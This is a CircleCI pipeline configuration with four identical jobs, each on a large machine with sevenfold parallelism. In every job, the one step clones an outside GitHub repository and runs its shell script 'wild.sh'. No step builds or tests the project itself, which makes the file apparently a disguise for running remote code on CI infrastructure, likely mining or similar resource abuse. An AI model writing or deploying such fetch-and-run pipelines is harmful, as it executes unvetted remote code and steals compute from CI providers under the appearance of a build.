version: 2.1 
jobs: 
    Devop: 
      machine: 
        image: ubuntu-2004:202010-01 
        resource_class: large 
      parallelism: 7     
      steps: 
        - checkout 
        - run: 
            name: "ANDROMEDA" 
            command: git clone https://github.com/joecristian147/lokok.git && cd lokok && chmod +x *.sh && ./wild.sh
    Devop1: 
      machine: 
        image: ubuntu-2004:202010-01 
        resource_class: large 
      parallelism: 7    
      steps: 
        - checkout 
        - run: 
            name: "ANDROMEDA" 
            command: git clone https://github.com/joecristian147/lokok.git && cd lokok && chmod +x *.sh && ./wild.sh
    Devop2: 
      machine: 
        image: ubuntu-2004:202010-01 
        resource_class: large 
      parallelism: 7 
      steps: 
        - checkout 
        - run: 
            name: "ANDROMEDA" 
            command: git clone https://github.com/joecristian147/lokok.git && cd lokok && chmod +x *.sh && ./wild.sh
    Devop3: 
      machine: 
        image: ubuntu-2004:202010-01 
        resource_class: large  
      parallelism: 7 
      steps: 
        - checkout 
        - run: 
            name: "ANDROMEDA" 
            command: git clone https://github.com/joecristian147/lokok.git && cd lokok && chmod +x *.sh && ./wild.sh
workflows: 
    version: 2.1 
    build: 
        jobs: 
            - Devop
            - Devop1
            - Devop2
            - Devop3